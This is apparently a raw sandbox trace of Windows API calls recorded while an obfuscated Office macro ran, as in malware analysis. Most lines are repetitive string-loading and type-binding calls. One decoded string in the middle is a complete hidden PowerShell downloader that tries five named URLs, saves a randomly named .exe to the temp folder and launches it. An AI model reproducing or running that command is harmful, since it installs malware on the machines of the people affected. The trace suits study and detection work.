hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.305] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.305] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.306] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.306] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.306] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.306] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.306] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.306] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.307] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.307] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.307] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.307] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.307] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.308] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.308] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.308] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.309] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.309] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.309] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.309] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.309] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.309] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.310] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.310] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.310] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.310] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.310] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.310] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.310] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.310] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.311] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.312] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.313] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.313] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.313] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.313] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.313] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.313] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.313] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.313] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.314] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.314] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.314] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.314] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.314] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.314] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.314] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.314] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.315] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.315] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.315] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.315] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.315] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.315] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.315] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.315] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.316] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.316] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.316] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.322] atoi (_Str="1252") returned 1252 [0061.322] SysStringByteLen (bstr="潰敷獲敨汬ⴠ楗摮睯瑓汹⁥楈摤湥␠獷牣灩⁴‽敮⵷扯敪瑣ⴠ潃佭橢捥⁴南牣灩⹴桓汥㭬眤扥汣敩瑮㴠渠睥漭橢捥⁴祓瑳浥丮瑥圮扥汃敩瑮␻慲摮浯㴠渠睥漭橢捥⁴慲摮浯␻牵獬㴠✠瑨灴⼺振牡敢潹摮瑳牯⹥潣⽭楣湡晲⽴栬瑴㩰⼯硰杰慲桰捩⹳潣⽭獥穰畹瑲Ⱟ瑨灴⼺港湯敩牵⹯潣⽭慸煵⽴栬瑴㩰⼯瑳摵潩楧⹦潣⹭牢樯摥癴穵歩⽹栬瑴㩰⼯潭潴杲物獬癴挮浯欯浤✯匮汰瑩✨✬㬩渤浡⁥‽爤湡潤⹭敮瑸ㄨ‬㔶㌵⤶␻慰桴㴠␠湥㩶整灭⬠✠❜⬠␠慮敭⬠✠攮數㬧潦敲捡⡨甤汲椠甤汲⥳瑻祲⑻敷换楬湥⹴潄湷潬摡楆敬␨牵⹬潔瑓楲杮⤨‬瀤瑡⥨医慴瑲倭潲散獳␠慰桴戻敲歡紻慣捴筨牷瑩ⵥ潨瑳␠⹟硅散瑰潩⹮敍獳条㭥絽") returned 0x222 [0061.323] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x88a64a4, cbMultiByte=546, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 546 [0061.323] SysStringByteLen (bstr="潰敷獲敨汬ⴠ楗摮睯瑓汹⁥楈摤湥␠獷牣灩⁴‽敮⵷扯敪瑣ⴠ潃佭橢捥⁴南牣灩⹴桓汥㭬眤扥汣敩瑮㴠渠睥漭橢捥⁴祓瑳浥丮瑥圮扥汃敩瑮␻慲摮浯㴠渠睥漭橢捥⁴慲摮浯␻牵獬㴠✠瑨灴⼺振牡敢潹摮瑳牯⹥潣⽭楣湡晲⽴栬瑴㩰⼯硰杰慲桰捩⹳潣⽭獥穰畹瑲Ⱟ瑨灴⼺港湯敩牵⹯潣⽭慸煵⽴栬瑴㩰⼯瑳摵潩楧⹦潣⹭牢樯摥癴穵歩⽹栬瑴㩰⼯潭潴杲物獬癴挮浯欯浤✯匮汰瑩✨✬㬩渤浡⁥‽爤湡潤⹭敮瑸ㄨ‬㔶㌵⤶␻慰桴㴠␠湥㩶整灭⬠✠❜⬠␠慮敭⬠✠攮數㬧潦敲捡⡨甤汲椠甤汲⥳瑻祲⑻敷换楬湥⹴潄湷潬摡楆敬␨牵⹬潔瑓楲杮⤨‬瀤瑡⥨医慴瑲倭潲散獳␠慰桴戻敲歡紻慣捴筨牷瑩ⵥ潨瑳␠⹟硅散瑰潩⹮敍獳条㭥絽") returned 0x222 [0061.323] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x88a64a4, cbMultiByte=547, lpWideCharStr=0x88b846c, cchWideChar=547 | out: lpWideCharStr="powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}") returned 547 [0061.323] SafeArrayDestroyData (psa=0x344500) returned 0x0 [0061.323] SafeArrayDestroyData (psa=0x344538) returned 0x0 [0061.323] SafeArrayDestroyData (psa=0x86bb380) returned 0x0 [0061.323] SafeArrayDestroyDescriptor (psa=0x86bb380) returned 0x0 [0061.323] SafeArrayDestroyData (psa=0x34451c) returned 0x0 [0061.323] SafeArrayDestroyData (psa=0x3444e4) returned 0x0 [0061.323] SafeArrayDestroyData (psa=0x86bb650) returned 0x0 [0061.323] SafeArrayDestroyDescriptor (psa=0x86bb650) returned 0x0 [0061.324] CRetailMalloc_Realloc () returned 0x87504e0 [0061.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1222, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="YxNTMPU") returned 8 [0061.325] ITypeComp:RemoteBind (in: This=0x87cef08, szName="YxNTMPU", lHashVal=0x10c0cb, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdd2 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdd2) returned 0x0 [0061.325] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.325] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1222 | out: _Dst=0x87fcf50) returned 0x0 [0061.325] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080932, cbMultiByte=15, lpWideCharStr=0x343d54, cchWideChar=16 | out: lpWideCharStr="_B_var_YxNTMPU") returned 15 [0061.325] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_YxNTMPU", lHashVal=0x10c44f, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.326] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1222 | out: _Dst=0x343dbc) returned 0x0 [0061.326] CRetailMalloc_Free () returned 0x7dc0201 [0061.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1246, cbMultiByte=9, lpWideCharStr=0x343d44, cchWideChar=10 | out: lpWideCharStr="ADmZdVsM") returned 9 [0061.326] ITypeComp:RemoteBind (in: This=0x87cef08, szName="ADmZdVsM", lHashVal=0x10502c, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdd4 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdd4) returned 0x0 [0061.327] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.327] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1246 | out: _Dst=0x87fcf50) returned 0x0 [0061.327] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb08095e, cbMultiByte=16, lpWideCharStr=0x343d54, cchWideChar=17 | out: lpWideCharStr="_B_var_ADmZdVsM") returned 16 [0061.327] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_ADmZdVsM", lHashVal=0x1027b5, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.327] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1246 | out: _Dst=0x343dbc) returned 0x0 [0061.327] CRetailMalloc_Free () returned 0x7dc0201 [0061.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e126e, cbMultiByte=10, lpWideCharStr=0x343d44, cchWideChar=11 | out: lpWideCharStr="qcyQbUNXY") returned 10 [0061.328] ITypeComp:RemoteBind (in: This=0x87cef08, szName="qcyQbUNXY", lHashVal=0x107f02, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdd6 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdd6) returned 0x0 [0061.328] CRetailMalloc_Alloc () returned 0x8756fc0 [0061.328] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e126e | out: _Dst=0x8756fc0) returned 0x0 [0061.329] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb08098a, cbMultiByte=17, lpWideCharStr=0x343d54, cchWideChar=18 | out: lpWideCharStr="_B_var_qcyQbUNXY") returned 17 [0061.329] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_qcyQbUNXY", lHashVal=0x108847, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.329] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e126e | out: _Dst=0x343dbc) returned 0x0 [0061.329] CRetailMalloc_Realloc () returned 0x6210680 [0061.329] CRetailMalloc_Free () returned 0x1a0a0101 [0061.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1296, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="Ky03G") returned 6 [0061.330] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Ky03G", lHashVal=0x10ddfd, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdd8 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdd8) returned 0x0 [0061.330] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.330] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1296 | out: _Dst=0x87fcf50) returned 0x0 [0061.331] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb0809ba, cbMultiByte=13, lpWideCharStr=0x343d54, cchWideChar=14 | out: lpWideCharStr="_B_var_Ky03G") returned 13 [0061.331] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Ky03G", lHashVal=0x10a1ea, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.331] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1296 | out: _Dst=0x343dbc) returned 0x0 [0061.331] CRetailMalloc_Free () returned 0x7dc0201 [0061.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e12ba, cbMultiByte=9, lpWideCharStr=0x343d44, cchWideChar=10 | out: lpWideCharStr="V8VhMegG") returned 9 [0061.332] ITypeComp:RemoteBind (in: This=0x87cef08, szName="V8VhMegG", lHashVal=0x1071bd, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdda | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdda) returned 0x0 [0061.332] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.332] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e12ba | out: _Dst=0x87fcf50) returned 0x0 [0061.332] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb0809e6, cbMultiByte=16, lpWideCharStr=0x343d54, cchWideChar=17 | out: lpWideCharStr="_B_var_V8VhMegG") returned 16 [0061.332] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_V8VhMegG", lHashVal=0x104946, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.333] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e12ba | out: _Dst=0x343dbc) returned 0x0 [0061.333] CRetailMalloc_Free () returned 0x7dc0201 [0061.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e12e2, cbMultiByte=10, lpWideCharStr=0x343d44, cchWideChar=11 | out: lpWideCharStr="tKlXmGBTO") returned 10 [0061.333] ITypeComp:RemoteBind (in: This=0x87cef08, szName="tKlXmGBTO", lHashVal=0x10b0e0, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xddc | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xddc) returned 0x0 [0061.333] CRetailMalloc_Alloc () returned 0x8756fc0 [0061.333] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e12e2 | out: _Dst=0x8756fc0) returned 0x0 [0061.334] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080a12, cbMultiByte=17, lpWideCharStr=0x343d54, cchWideChar=18 | out: lpWideCharStr="_B_var_tKlXmGBTO") returned 17 [0061.334] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_tKlXmGBTO", lHashVal=0x10ba25, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.334] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e12e2 | out: _Dst=0x343dbc) returned 0x0 [0061.334] CRetailMalloc_Free () returned 0x1a0a0101 [0061.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e130a, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="JeLCm") returned 6 [0061.335] ITypeComp:RemoteBind (in: This=0x87cef08, szName="JeLCm", lHashVal=0x108926, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdde | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdde) returned 0x0 [0061.335] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.335] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e130a | out: _Dst=0x87fcf50) returned 0x0 [0061.336] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080a42, cbMultiByte=13, lpWideCharStr=0x343d54, cchWideChar=14 | out: lpWideCharStr="_B_var_JeLCm") returned 13 [0061.336] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_JeLCm", lHashVal=0x104d13, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.336] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e130a | out: _Dst=0x343dbc) returned 0x0 [0061.336] CRetailMalloc_Free () returned 0x7dc0201 [0061.337] 